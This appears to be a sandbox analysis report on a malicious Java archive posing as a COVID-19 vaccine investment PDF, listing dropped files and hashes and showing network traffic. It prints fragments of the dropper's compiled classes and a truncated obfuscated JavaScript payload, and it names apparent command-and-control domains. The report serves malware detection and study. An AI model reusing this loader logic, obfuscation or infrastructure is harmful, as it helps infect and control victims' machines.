                                                                                                                                          Preview: PK..........WR................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK..........WR................carLambo/resources/config.txt.... ....r.h..h..=.._i.LG.........1..KK..kRo..h...L.t[.06...u..4....y.....3>.H29.jql^e}..5..A[i....t.p.5.......#t.@..`..M..e.-.:T?n...mF.._..G..6.D\.r.AZ/.. .Hq.....{../....mQ..)}../...PK..)!..........PK..........WR................carLambo/sbsgssdfg.class.Xy|.W........XJ..P .f.@....$..I.B.]b..;{.f..L(H.T.....U.Gl...]..W....>Zo..=.Z.....fg........}....x.w..v......h.......b%.....@...R+..B.;%.K.%.G.{%.O..%.$..0".!..K....J....I...GE|I..D<&.."~(.G"~,.'"~*.g"~..."~).W"...l!.E.!..e.1lg.g..a..~.73....o+.\....n..U.!...od..p3...:p.3_...W ...lu............a...!.p#.-......2.....;.......b.j...jq...).A../......e8..#x../..'...0|..b.o.CN<.O..I
                                                                                                                                          C:\jar\META-INF\MANIFEST.MF
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):61
                                                                                                                                          Entropy (8bit):4.7373932798666365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:ZLCAWIzBEb2bIIT/fbhn:1KItG2bIif9
                                                                                                                                          MD5:1EE8E1A0462F25F07B4DBF06F695AB24
                                                                                                                                          SHA1:77384293E385C5E84D31957A55D54EECB7987780
                                                                                                                                          SHA-256:50B85BA7210C8BFE4B43E3F0BC2C2ADAF553A81EBF6F1760605BC974DA4FFF2A
                                                                                                                                          SHA-512:7A51A0C14DE218A46FF088CB07B917ECAEE04B07C14D9F0F96EB9189517E16093DE962E9C3525A1BEAA7A034DCAB763C9C7105C819F9A870412872E7A20A7C9C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Manifest-Version: 1.0..Main-Class: keuqzwqbvn.Mmwwrnygnfl....
                                                                                                                                          C:\jar\keuqzwqbvn\Mlncjyhbeex.class
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:compiled Java class data, version 50.0 (Java 1.6)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):830
                                                                                                                                          Entropy (8bit):5.404149665200583
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:5uWyQulrLOIGHBkjW1Pe4g591b/6G69JU:5uWyFlri7HBKWbg59UG
                                                                                                                                          MD5:ECC9EEE8A05B0512B8D0A5BCAD7F226A
                                                                                                                                          SHA1:B5E86BD53AC08A7CDE0415C2358DF39C2F2D6988
                                                                                                                                          SHA-256:C70E1B34DDE5968C6DE14F23F3AF4042D46D30336534C70A0ACB54BD07824EF9
                                                                                                                                          SHA-512:76D555A6BECA72FE46778492D0E728E1E08B2A6BF70D002B39EF2BEA153D92415C1ABD8C1CD296C0536109DCA9EA068620DA7E43C6B91947CD36A9FD9E104AE2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .......2.1................... .... ..!..".#..$..%...<init>...()V...Code...LineNumberTable...t1nUbU..2(Ljava/io/InputStream;Ljava/io/FileOutputStream;)V...StackMapTable..&..$..'..(..!...b1g4Nth..)(Ljava/lang/Runtime;[Ljava/lang/String;)V...Exceptions...SourceFile...Mmwwrnygnfl.java.......'..).*..(..+.,..-.....java/lang/Exception...../.0...keuqzwqbvn/Mlncjyhbeex...java/lang/Object...[B...java/io/InputStream...java/io/FileOutputStream...read...([BII)I...write...([BII)V...close...java/lang/Runtime...exec..(([Ljava/lang/String;)Ljava/lang/Process;. ................................*.........................................0.>.....:.+.........Y>...,..........+...,......N......+..........."...............#...'...+......./. .................................................#........+,...W................"...#....................
                                                                                                                                          C:\jar\keuqzwqbvn\Mmwwrnygnfl.class
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:compiled Java class data, version 50.0 (Java 1.6)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1582
                                                                                                                                          Entropy (8bit):5.578097902648525
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:iADsrmDul0zOQbpi55UDV++vLRDCNQzw/WXurvNwHhWwSc+:JsrmKlJcpU5UDgQ+SztgvshWwh+
                                                                                                                                          MD5:9452592892A800D155BC45667FA3BB75
                                                                                                                                          SHA1:8245B9ECBD34DBEA7DF48EEC85AD1A1CB18C6D27
                                                                                                                                          SHA-256:F0283C3945E263B9DE97C6A1FC1CF42DD1D8F9DD8DD8CDD44D8550E86DBB8A8F
                                                                                                                                          SHA-512:BD99C29EDCCDAB2129413D0D555D0ABB117FEFFC64BD4C69ED0EF3923444FA036B88BE782B1057E87D038B41E7C3338A330F634FB8A51CDEEA2B95721ED56F38
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .......2.Y....*..+....,..-...../.0..1....2....3..4.5....6..7..8....*..9..:.;....<..=.>..?....@..A....B....C....6....3..D...<init>...([Ljava/lang/Object;)V...Code...LineNumberTable...Exceptions..E...q22RDt...main...([Ljava/lang/String;)V...b1g4Nth..)(Ljava/lang/Runtime;[Ljava/lang/String;)V...t1nUbU..2(Ljava/io/InputStream;Ljava/io/FileOutputStream;)V...SourceFile...Mmwwrnygnfl.java....F...java/lang/Object..!.....keuqzwqbvn/Mmwwrnygnfl...[Ljava/lang/String;..G..H.I...java/io/FileOutputStream....J..&.'..K..L.M..$.%...java/lang/String...java/lang/StringBuilder...user.home..N..O.P..Q.R..S..T.U...fukvowbkrs.js..V.W...resources/umxybpjabc....X........keuqzwqbvn/Mlncjyhbeex...java/lang/Exception...()V...java/lang/Class...getResourceAsStream..)(Ljava/lang/String;)Ljava/io/InputStream;...(Ljava/lang/String;)V...java/lang/Runtime...getRuntime...()Ljava/lang/Runtime;...java/lang/System...getProperty..&(Ljava/lang/String;)Ljava/lang/String;...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;.
                                                                                                                                          C:\jar\keuqzwqbvn\resources\umxybpjabc
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:ASCII text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):737167
                                                                                                                                          Entropy (8bit):4.705946433849389
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:egg4cP9SSJTS7PEwU5tTBWoZEIZCSfq7mjJMF4taWAo/YABu1kL3QNQoxvHp6GVE:M
                                                                                                                                          MD5:EE526513580FDCE38FBD47E380081DA0
                                                                                                                                          SHA1:05A7DBB90B51A6BF6EEF394DC565A22242A4E0DD
                                                                                                                                          SHA-256:EDF1D7DFB797D66CEACE6695998240EDF67C5F08D06767A66ABC1C66830527F4
                                                                                                                                          SHA-512:C14E5381A3C569918957FC0A35B0970786B2E128709E8A26419AE96972BC8B507DD44DA51E60871AB85313C63D4045035E4A48EEE15BA2DF731A7328FCD8618F
                                                                                                                                          Malicious:false
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: C:\jar\keuqzwqbvn\resources\umxybpjabc, Author: Florian Roth
                                                                                                                                          Preview: var efr3b0h = [.function(zen1thB){..var mkk_pl4z4 = Array(zen1thB[0],......."\x6D\x6B\x6B\x5F\x70\x6C\x34\x7A\x34\x5B\x30\x5D\x20\x3D\x20\x6D\x6B\x6B\x5F\x70\x6C\x34\x7A\x34\x5B\x30\x5D\x2E");..mkk_pl4z4[0] = mkk_pl4z4[0].replace(new RegExp(">%@", "g"), "A");..var f_truth = [......."\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B",......."\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B".......];..zen1thB[1][r0bl3NP(10,9)].f_truth = f_truth;..zen1thB[1][r0bl3NP(10,9)].mkk_pl4z4 = mkk_pl4z4;..new zen1thB[1]([eval]);..return Array(function(vmk){return [mkk_pl4z4][vmk];})[0](0);.},.Array("CreateObject","Rea", "undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","Position","\x54\x79\x70\x65","Open","Write","node")..];.eval("String[\"prototype\"].l00p6x = function(){return \"m!FyIFZMJExPJEUgPSBbIlx4NTVceDQ1XHg3M1x4NDRceDQyXHg0Mlx4NTFceDNFXHgyNVx4NDBceDQzXHgzRVx4MjVceDQwXHg2N1x4NDlceDNFXHgyNVx4NDBceDRBXHg2Rlx4NTmceDU2XHgzMVx4NDlceDNFXHgyNVx4NDBceDNFX

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Entropy (8bit):7.699961628296007
                                                                                                                                          TrID:
                                                                                                                                          • Java Archive (13504/1) 62.80%
                                                                                                                                          • ZIP compressed archive (8000/1) 37.20%
File name: Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar
File size: 178235 bytes
MD5: 5435ec679cdd07fe6f4fc6f49a117ea8
SHA1: eab4494e7db4bcbebf9dc5c0197ce0081a6dda6e
SHA256: 5a962977909fafba0a1c202306068bd5f8297335b16989a07c1f119302155c84
SHA512: b4b1a09413019c70867cfb2ddfb95ea21c86775991c1f8008e72af045abf9bcb436bdcc20affda4275fbc8216c4649f3b667ff0846215c38c5af026301b88380
SSDEEP: 3072:EIeObnK0Jmn6IhnudnEozlLaEd9J1vqmGzp5rlHh3tn/9Yj4Yw54bfTRykQRYb:EI3bKrn6MuVE8lD9LSmGrrv38sYw5s7X
File Content Preview: PK.........aWR.V..U....?....$.keuqzwqbvn/resources/umxybpjabc.. ..........{)......-)......-).......}.#.u...>.w..$.0.e.Y#..f.lm.(..a.......=&.eaV..+.w..so..a5.Y.bw....(........{............7......|..o..............o.....>..?=}..t..o._N/.>...>..q....W?../..

File Icon

Icon Hash: d28c8e8ea2868ad6

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Feb 23, 2021 21:04:22.712953091 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.713040113 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.713053942 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.714381933 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:22.755150080 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:22.755253077 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:22.756622076 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.756649971 CET  443       49719     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.756688118 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.756747961 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.756810904 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.756815910 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.823820114 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:22.823934078 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.824155092 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.824196100 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.865644932 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:22.865699053 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:22.865737915 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:22.865792990 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:22.867369890 CET  443       49719     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.867424011 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.867521048 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868551970 CET  443       49719     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868596077 CET  443       49719     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868626118 CET  443       49719     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868664026 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868701935 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868707895 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.868731022 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868769884 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868802071 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.868817091 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868848085 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:22.868905067 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.945523977 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.969150066 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:22.969197989 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.969592094 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.991509914 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.991631031 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.991683006 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.991844893 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:22.995605946 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.995722055 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.995753050 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:22.995789051 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:23.032128096 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.032454014 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:23.034961939 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.034984112 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.036494017 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:23.036879063 CET  443       49719     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.039002895 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.039037943 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.039216042 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.040357113 CET  443       49719     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.045011997 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:23.045314074 CET  49719     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.045366049 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.045392990 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.091630936 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:23.091659069 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:23.091677904 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:23.091695070 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:23.091715097 CET  443       49721     140.82.121.3     192.168.2.3
Feb 23, 2021 21:04:23.091743946 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091758966 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:23.091768026 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091792107 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091794968 CET  49721     443       192.168.2.3      140.82.121.3
Feb 23, 2021 21:04:23.091814995 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091825962 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.091839075 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091862917 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091873884 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.091886044 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091907978 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091933966 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.091933966 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.091953039 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.091962099 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.092044115 CET  49718     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.094165087 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094196081 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094218969 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094244957 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094269037 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094290018 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094311953 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094312906 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.094336033 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094346046 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.094352007 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.094360113 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094382048 CET  443       49720     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.094398022 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.094443083 CET  49720     443       192.168.2.3      199.232.192.209
Feb 23, 2021 21:04:23.095511913 CET  443       49718     199.232.192.209  192.168.2.3
Feb 23, 2021 21:04:23.095537901 CET  443       49718     199.232.192.209  192.168.2.3

UDP Packets

Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Feb 23, 2021 21:04:04.787981987 CET  51281     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:04.839752913 CET  53        51281     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:05.738883972 CET  49199     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:05.792526960 CET  53        49199     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:06.778394938 CET  50620     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:06.836930990 CET  53        50620     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:06.930882931 CET  64938     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:06.990648985 CET  53        64938     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:07.752113104 CET  60152     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:07.803603888 CET  53        60152     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:08.780697107 CET  57544     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:08.829201937 CET  53        57544     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:10.061552048 CET  55984     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:10.124532938 CET  53        55984     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:11.242398977 CET  64185     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:11.291132927 CET  53        64185     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:12.172589064 CET  65110     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:12.224208117 CET  53        65110     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:13.587836981 CET  58361     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:13.636614084 CET  53        58361     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:14.620203972 CET  63492     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:14.670813084 CET  53        63492     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:15.954237938 CET  60831     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:16.005600929 CET  53        60831     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:16.926575899 CET  60100     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:16.978249073 CET  53        60100     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:18.195648909 CET  53195     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:18.244349957 CET  53        53195     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:18.986308098 CET  50141     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:19.036731958 CET  53        50141     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:21.187669992 CET  53023     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:21.237144947 CET  53        53023     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:22.259543896 CET  49563     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:22.312324047 CET  53        49563     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:22.646025896 CET  51352     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:22.646184921 CET  59349     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:22.706168890 CET  53        51352     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:22.710860014 CET  53        59349     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:23.130125046 CET  57084     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:23.188406944 CET  53        57084     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:23.439188957 CET  58823     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:23.488096952 CET  53        58823     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:24.999437094 CET  57568     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:25.079427004 CET  53        57568     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:42.766957998 CET  50540     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:42.782876015 CET  54366     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:42.832326889 CET  53        50540     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:42.840290070 CET  53        54366     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:50.739006996 CET  53034     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:50.826561928 CET  53        53034     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:50.993541956 CET  57762     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:51.047672987 CET  53        57762     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:51.840692043 CET  55435     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:51.897739887 CET  53        55435     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:52.119888067 CET  50713     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:52.171313047 CET  53        50713     8.8.8.8          192.168.2.3
Feb 23, 2021 21:04:52.228467941 CET  56132     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:04:52.462094069 CET  53        56132     8.8.8.8          192.168.2.3
Feb 23, 2021 21:05:00.102988005 CET  58987     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:05:00.154455900 CET  53        58987     8.8.8.8          192.168.2.3
Feb 23, 2021 21:05:04.293481112 CET  56579     53        192.168.2.3      8.8.8.8
Feb 23, 2021 21:05:04.521935940 CET  53        56579     8.8.8.8          192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:18.343533993 CET6063353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:18.413583994 CET53606338.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:27.343029976 CET6129253192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:27.391772985 CET53612928.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:28.235084057 CET6361953192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:28.284691095 CET53636198.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:30.140880108 CET6493853192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:30.203813076 CET53649388.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:59.069261074 CET6194653192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:59.302706003 CET53619468.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:05:59.311817884 CET6491053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:05:59.535707951 CET53649108.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:01.412451982 CET5212353192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:06:01.461036921 CET53521238.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:02.047835112 CET5613053192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:06:02.125761986 CET53561308.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:35.015863895 CET5633853192.168.2.38.8.8.8
                                                                                                                                          Feb 23, 2021 21:06:35.237154007 CET53563388.8.8.8192.168.2.3
                                                                                                                                          Feb 23, 2021 21:06:51.716965914 CET5942053192.168.2.38.8.8.8

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 21:04:22.646025896 CET | 192.168.2.3 | 8.8.8.8 | 0x1573 | Standard query (0) | repo1.maven.org | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:22.646184921 CET | 192.168.2.3 | 8.8.8.8 | 0x94c2 | Standard query (0) | github.com | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:23.130125046 CET | 192.168.2.3 | 8.8.8.8 | 0x439e | Standard query (0) | github-releases.githubusercontent.com | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:42.782876015 CET | 192.168.2.3 | 8.8.8.8 | 0x2f6e | Standard query (0) | str-master.pw | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:50.739006996 CET | 192.168.2.3 | 8.8.8.8 | 0xba98 | Standard query (0) | jbfrost.live | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:50.993541956 CET | 192.168.2.3 | 8.8.8.8 | 0xd94a | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:51.840692043 CET | 192.168.2.3 | 8.8.8.8 | 0x67af | Standard query (0) | str-master.pw | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:52.228467941 CET | 192.168.2.3 | 8.8.8.8 | 0x75b5 | Standard query (0) | pluginserver.duckdns.org | A (IP address) | IN (0x0001)
Feb 23, 2021 21:05:04.293481112 CET | 192.168.2.3 | 8.8.8.8 | 0xbd0 | Standard query (0) | strizzz100.duckdns.org | A (IP address) | IN (0x0001)
Feb 23, 2021 21:05:59.069261074 CET | 192.168.2.3 | 8.8.8.8 | 0x5536 | Standard query (0) | strizzz100.duckdns.org | A (IP address) | IN (0x0001)
Feb 23, 2021 21:05:59.311817884 CET | 192.168.2.3 | 8.8.8.8 | 0x3a23 | Standard query (0) | pluginserver.duckdns.org | A (IP address) | IN (0x0001)
Feb 23, 2021 21:06:35.015863895 CET | 192.168.2.3 | 8.8.8.8 | 0xd395 | Standard query (0) | pluginserver.duckdns.org | A (IP address) | IN (0x0001)
Feb 23, 2021 21:06:51.716965914 CET | 192.168.2.3 | 8.8.8.8 | 0x9a7e | Standard query (0) | strizzz100.duckdns.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 21:04:22.706168890 CET | 8.8.8.8 | 192.168.2.3 | 0x1573 | No error (0) | repo1.maven.org | sonatype.map.fastly.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 21:04:22.706168890 CET | 8.8.8.8 | 192.168.2.3 | 0x1573 | No error (0) | sonatype.map.fastly.net | - | 199.232.192.209 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:22.706168890 CET | 8.8.8.8 | 192.168.2.3 | 0x1573 | No error (0) | sonatype.map.fastly.net | - | 199.232.196.209 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:22.710860014 CET | 8.8.8.8 | 192.168.2.3 | 0x94c2 | No error (0) | github.com | - | 140.82.121.3 | A (IP address) | IN (0x0001)
Feb 23, 2021 21:04:23.188406944 CET | 8.8.8.8 | 192.168.2.3 | 0x439e | No error (0) | github-releases.githubusercontent.com | - | 185.199.108.154 | A (IP address) | IN (0x0001)
